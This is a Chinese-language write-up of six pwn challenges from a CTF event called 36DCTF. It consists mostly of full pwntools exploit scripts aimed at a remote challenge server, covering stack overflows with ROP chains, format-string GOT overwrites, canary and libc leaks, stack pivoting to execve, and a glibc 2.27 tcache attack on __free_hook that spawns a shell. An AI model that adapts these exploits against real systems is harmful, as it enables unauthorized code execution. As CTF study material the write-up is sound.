写一下36DCTF的6个PWN题,估计有些题和预期不一样
签到题
简单的栈溢出, 在BSS上写上一个/bin/sh字符串即可
1 | from pwn import* |
2 | p = remote('124.156.121.112',28065) |
3 | context.log_level ='DEBUG' |
4 | elf =ELF('./main') |
5 | pop_rdi_ret = 0x04006D3 |
6 | payload = 'U'*0x20 + 'U'*8 + p64(pop_rdi_ret) + p64(elf.bss()+0x100) + p64(elf.plt['gets']) + p64(pop_rdi_ret) + p64(elf.bss()+0x100) + p64(elf.plt['system']) |
7 | p.sendline(payload) |
8 | p.sendline('/bin/sh\x00') |
9 | p.interactive() |
然后Docker过滤了空格,用[base64<flag]可以打印出flag
下载 EXP MAIN
baby_fmtstr
这个题我就比较…,题目不难,看到一个printf的格式化字符串漏洞,再看了一眼got表可写,然后直接read地址爆破4bit变成one_gadget,概率1/16
1 | from pwn import* |
2 | p = process('./main') |
3 | p = remote('124.156.121.112',28086) |
4 | libc =ELF('./libc-2.23.so') |
5 | elf =ELF('./main') |
6 | payload = '%82c%12$hhn' + '%82c%13$hhn' |
7 | payload = payload.ljust(0x20,'\x00') |
8 | payload += p64(elf.got['read'] + 1) + p64(elf.got['read']) |
9 | p.sendline(payload) |
10 | p.sendline('FMYY') |
11 | p.interactive() |
MagicString
同样往bss上写/bin/sh字符串然后getshell
1 | from pwn import* |
2 | p = remote('124.156.121.112',28021) |
3 | elf =ELF('./main') |
4 | pop_rdi_ret = 0x400733 |
5 | payload = 'U'*0x2A0 + 'U'*8 + p64(pop_rdi_ret) + p64(0x601060) + p64(elf.plt['gets']) + p64(pop_rdi_ret) + p64(0x601060) + p64(elf.plt['system']) |
6 | p.sendline(payload) |
7 | p.sendline('/bin/sh\x00') |
8 | p.interactive() |
MengXinStack
简单的栈,泄露了canary和libc就足够
1 | from pwn import* |
2 | p = process('./main') |
3 | p = remote('124.156.121.112',28051) |
4 | elf =ELF('./main') |
5 | libc =ELF('./libc-2.23.so') |
6 | context.log_level ='DEBUG' |
7 | p.sendafter('hello?','U'*0x25 + 'FMYY') |
8 | p.recvuntil('FMYY') |
9 | canary = u64(p.recv(7).rjust(8,'\x00')) |
10 | log.info('Canary:\t' + hex(canary)) |
11 | stack = u64(p.recv(6).ljust(8,'\x00')) - 304 |
12 | payload = '\x00'*0x28 + p64(canary) + '\x00'*0x10 + p64(stack) + '\xF0\xD7' |
13 | p.send(payload) |
14 | p.send('U'*0x44 + 'FMYY') |
15 | p.recvuntil('FMYY') |
16 | libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['__libc_start_main'] - 240 |
17 | log.info('LIBC:\t'+ hex(libc_base)) |
18 | rce = libc_base + 0xF1147 |
19 | p.send('\x00'*0x28 + p64(canary) + '\x00'*0x10 + p64(stack) + p64(rce)) |
20 | |
21 | p.interactive() |
tang
单字节修改,多次利用格式化字符串取得canary libc pie,然后不清楚rce远程打不通,然后就栈迁移到bss段,system也不通,换成execve就行了
1 | #coding=utf-8 |
2 | from pwn import * |
3 | p = process('./main') |
4 | p = remote('124.156.121.112',28017) |
5 | elf = ELF('./main') |
6 | libc =ELF('./libc-2.23.so',checksec=False) |
7 | context.log_level = 'DEBUG' |
8 | #leak the canary |
9 | p.sendlineafter('你怎么了?\n','%9$p') |
10 | canary = int(p.recv(18),16) |
11 | p.sendafter('烫烫烫烫\n','FMYY') |
12 | |
13 | #leak the libc |
14 | p.sendafter('远一点!\n','\x00'*0x38 + p64(canary) + '\x00'*0x10 + p64(0) + '\x03') |
15 | p.send('%23$p') |
16 | p.recvline() |
17 | libc_base = int(p.recv(14),16) - 240 - libc.sym['__libc_start_main'] |
18 | |
19 | binsh = libc_base + libc.search('/bin/sh').next() |
20 | execve = libc_base + libc.sym['execve'] |
21 | pop_rdx_ret = libc_base + 0x01B92 |
22 | p.sendafter('烫烫烫烫\n','FMYY') |
23 | p.sendafter('远一点!\n','\x00'*0x38 + p64(canary) + '\x00'*0x10 + p64(0) + '\x03') |
24 | |
25 | #leak the pie |
26 | p.sendafter('你怎么了?\n','%11$p') |
27 | pie = int(p.recv(14),16) - 100 - elf.sym['main'] |
28 | leave_ret = pie + 0x9CA |
29 | pop_rdi_ret = pie + 0xB43 |
30 | pop_rsi_r15 = pie + 0xB41 |
31 | target = pie + (0x201040+0x108) |
32 | rce = libc_base + 0x4526A-6 |
33 | ret = pie + 0x295 |
34 | |
35 | #---------getshell |
36 | payload = '\x00'*0x108 |
37 | payload += p64(0) |
38 | payload += p64(pop_rdi_ret) |
39 | payload += p64(binsh) |
40 | payload += p64(pop_rdx_ret) |
41 | payload += p64(0) |
42 | payload += p64(pop_rsi_r15) |
43 | payload += p64(0) |
44 | payload += p64(0) |
45 | payload += p64(execve) |
46 | p.sendafter('烫烫烫烫\n',payload) |
47 | p.sendafter('远一点!\n','\x00'*0x38 + p64(canary) + '\x00'*0x10 + p64(target) + p64(leave_ret)) |
48 | p.interactive() |
baby_heap
入门的2.27堆,难度不高,多调试几次就行了
1 | #coding=utf-8 |
2 | from pwn import* |
3 | def new(content): |
4 | p.sendlineafter('>>','1') |
5 | p.sendafter('your 36D:',content) |
6 | def free(index): |
7 | p.sendlineafter('>>','2') |
8 | p.sendlineafter('index:',str(index)) |
9 | def show(index): |
10 | p.sendlineafter('>>','3') |
11 | p.sendlineafter('index:',str(index)) |
12 | |
13 | def modify(target,content): |
14 | free(1) |
15 | free(1) |
16 | new(target) |
17 | new('FMYY\n') |
18 | new(content) |
19 | p = process('./main') |
20 | p = remote('124.156.121.112',28060) |
21 | libc =ELF('./libc-2.27.so',checksec=False) |
22 | context.log_level ='DEBUG' |
23 | new('FMYY\n') |
24 | new('FMYY\n') |
25 | new('FMYY\n') |
26 | new('FMYY\n') |
27 | new('FMYY\n') |
28 | free(1) |
29 | free(0) |
30 | free(0) |
31 | show(0) |
32 | heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x10 - 0x250 |
33 | log.info('HEAP:\t'+ hex(heap_base)) |
34 | #-------------------- |
35 | new(p64(heap_base + 0x270) + '\n') |
36 | new(p64(0) + p64(0xB1)) |
37 | new('FAKE\n') |
38 | free(2) |
39 | modify(p64(heap_base+0x18) + '\n',p64(0xFF00) + '\n') |
40 | free(7) |
41 | show(7) |
42 | |
43 | |
44 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 - 0x10 - libc.sym['__malloc_hook'] |
45 | log.info('LIBC:\t' + hex(libc_base)) |
46 | free_hook = libc.sym['__free_hook'] + libc_base |
47 | rce = libc_base + 0x4F322 |
48 | modify(p64(free_hook) + '\n',p64(rce) + '\n') |
49 | free(4) |
50 | p.interactive() |